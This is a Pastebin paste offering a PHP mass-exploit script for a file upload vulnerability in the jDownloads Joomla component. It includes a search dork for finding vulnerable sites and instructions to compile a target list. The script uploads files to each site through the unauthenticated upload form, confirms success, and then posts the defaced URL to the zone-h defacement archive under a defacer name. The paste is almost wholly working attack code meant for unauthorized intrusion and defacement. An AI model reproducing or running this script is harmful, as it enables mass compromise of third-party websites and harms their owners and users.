API tools faq
paste
Advertisement
Kyfx

Jdownloads File Upload Vulnerability

Kyfx
May 20th, 2015
456
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
raw download clone embed print report
  1. Need targets make list.txt
  2.  
  3. Dork: "Powered by jDownloads"
  4.  
  5.  
  6. $file1='mt.zip';
  7. $file2='m.gif'; <--- Change that to your image for example kyfx.gif or png
  8.  
  9. Need PHP
  10.  
  11. Exploit:
  12. [PHP]<?php
  13. @set_time_limit(0);
  14. print"
  15. _ _ _ _
  16. (_) __| | _____ ___ __ | | ___ __ _ __| |___
  17. | |/ _` |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` / __|
  18. | | (_| | (_) \ V V /| | | | | (_) | (_| | (_| \__ \
  19. _/ |\__,_|\___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|___/
  20. |__/ http://www.mustafatopal.org Must@f@
  21.  
  22. ";
  23.  
  24.  
  25. echo "\n";
  26.  
  27. echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
  28.  
  29. echo "\n";
  30.  
  31. $get=@file_get_contents($x);
  32. $ex=explode("\r\n",$get);
  33. foreach($ex as $mag){
  34. echo "\t[+] scannign -->".$mag;
  35. echo jd($mag);
  36. }
  37. function jd($url){
  38.  
  39. $file1='mt.zip';
  40. $file2='m.gif';
  41.  
  42. $bbb='/index.php?option=com_jdownloads&Itemid=0&view=uplo ad';
  43. $sco=($url).($bbb);
  44.  
  45. $post=array(
  46. 'name'=>'ur name','mail'=>'blackwolf_cw@hotmail.com','catlist' =>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
  47. 'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
  48. 'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  49. 'option'=>"com_jdownloads",'view'=>"upload",'pic_u pload'=>"@$file2"
  50. );
  51. $ch = curl_init ($sco);
  52. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
  53. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  54. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
  55. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  56. curl_setopt ($ch, CURLOPT_POST, TRUE);
  57. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  58. $data = curl_exec ($ch);
  59.  
  60. curl_close ($ch);
  61. $path='/images/jdownloads/screenshots/';
  62. $final=($url).($path).($file2);
  63. if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
  64. echo "\n\t\t".'yes -->'.$final."\n";
  65.  
  66. $ch = curl_init ("http://www.zone-h.com/notify/single");
  67. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  68. curl_setopt ($ch, CURLOPT_POST, 1);
  69. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=Must@f@&domain1=$final&hackmode=1&reason= 1");
  70. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
  71. echo "\t\tZone-h --> Ok ". "\n\n";
  72. }else{
  73. echo "\t\tZone-h --> No". "\n\n"; }
  74. curl_close ($ch);
  75.  
  76.  
  77. }else{
  78. echo "\n\t\t".$url." --> not infected \n\n";
  79.  
  80.  
  81. }
  82. }
  83.  
  84.  
  85. ?>[/PHP]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!